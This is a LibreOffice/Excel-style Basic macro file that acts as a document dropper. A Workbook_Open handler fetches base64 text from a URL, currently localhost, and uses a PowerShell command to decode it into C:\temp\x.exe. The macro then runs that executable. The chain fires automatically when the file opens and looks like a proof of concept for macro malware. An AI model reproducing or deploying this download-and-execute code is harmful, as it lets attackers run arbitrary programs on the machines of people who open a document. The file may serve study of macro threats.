Function DownloadWebContent(url As String) As String
    Dim oDoc As Object
    Dim oSheet As Object
    Dim oAddress As Object
    Dim i As Long
    Dim result As String

    ' Get the current document and sheet
    oDoc = ThisComponent
    oSheet = oDoc.Sheets(0)

    ' Location for the data from the web page
    oAddress = oSheet.getCellByPosition(0, 0).getCellAddress()

    ' The HTML sections are named HTML_all, HTML_tables, HTML_1, HTML_2, HTML_3, etc.
    oDoc.AreaLinks.insertAtPosition(oAddress, url, "HTML_tables", "calc_HTML_WebQuery", "0 0")

    ' Wait for a moment to ensure the data is loaded
    Wait 2000

    ' Read the data from the first column of the sheet
    result = ""
    i = 0
    Do While oSheet.getCellByPosition(0, i).String <> ""
        result = result & oSheet.getCellByPosition(0, i).String & Chr(10)
        i = i + 1
    Loop

    ' Following breaks the link, but leaves the data
    oDoc.AreaLinks.removeByIndex(0)

    ' Remove specific HTML tags from the result
    result = Replace(result, "<td>", "")
    result = Replace(result, "<tr>", "")
    result = Replace(result, "<table>", "")
    result = Replace(result, "</td>", "")
    result = Replace(result, "</tr>", "")
    result = Replace(result, "</table>", "")

    ' Clear the data from the sheet
    For i = 0 To oSheet.Rows.Count - 1
        oSheet.getCellByPosition(0, i).String = ""
    Next i

    ' Return the result
    DownloadWebContent = result
End Function

Sub OpenFile()
    Dim ProgramPath As String
    ProgramPath = "C:\temp\x.exe" ' Path to the program
    Shell(ProgramPath, 1)
End Sub

Sub RunPowerShellUsingShell(psCommand As String)
    ' Run the command
    Shell(psCommand, 1)
End Sub

Sub SaveHTMLToCells(mystr As String)
    Dim htmlLines() As String
    Dim i As Long
    Dim oSheet As Object
    oSheet = ThisComponent.Sheets(0)

    ' Split the HTML content by "<" to get each tag
    htmlLines = Split(mystr, "<")

    ' Write each tag to a new cell in the active worksheet
    For i = LBound(htmlLines) To UBound(htmlLines)
        If htmlLines(i) <> "" Then
            oSheet.getCellByPosition(0, i).String = "<" & htmlLines(i)
        End If
    Next i
End Sub

Sub MainSub()
    Dim mystr As String
    Dim myHost As String
    Dim comm As String
    myHost = "http://127.0.0.1/base64.txt"
    mystr = DownloadWebContent(myHost)
    comm = "powershell -command ""[IO.File]::WriteAllBytes(""C:\temp\x.exe"", [Convert]::FromBase64String(" & mystr & "))"""
    SaveHTMLToCells(mystr)
    RunPowerShellUsingShell(comm)
    OpenFile
End Sub

Sub Workbook_Open()
    MainSub
End Sub
Sub SaveBase64ToFile(base64String As String, filePath As String)
    Dim oSimpleFileAccess As Object
    Dim oOutputStream As Object
    Dim decodedBytes() As Byte

    ' Decode the Base64 string
    decodedBytes = DecodeBase64(base64String)

    ' Create the SimpleFileAccess service
    oSimpleFileAccess = CreateUnoService("com.sun.star.ucb.SimpleFileAccess")

    ' Create an output stream to write the file
    oOutputStream = oSimpleFileAccess.openFileWrite(filePath)

    ' Write the decoded bytes to the file
    oOutputStream.writeBytes(decodedBytes)

    ' Close the output stream
    oOutputStream.closeOutput()
End Sub

Function DecodeBase64(base64String As String) As Byte()
    Dim oStringInputStream As Object
    Dim oBase64DecodingStream As Object
    Dim buffer(8191) As Byte
    Dim bytesRead As Long
    Dim result() As Byte

    ' Create a StringInputStream with the Base64 string
    oStringInputStream = CreateUnoService("com.sun.star.io.StringInputStream")
    oStringInputStream.setString(base64String)

    ' Create a Base64DecodingStream to decode the Base64 string
    oBase64DecodingStream = CreateUnoService("com.sun.star.io.Base64DecodingStream")
    oBase64DecodingStream.setInputStream(oStringInputStream)

    ' Read the decoded bytes from the Base64DecodingStream
    bytesRead = oBase64DecodingStream.readBytes(buffer(), UBound(buffer) + 1)
    result = buffer()
    ReDim Preserve result(bytesRead - 1)

    ' Return the decoded bytes
    DecodeBase64 = result
End Function
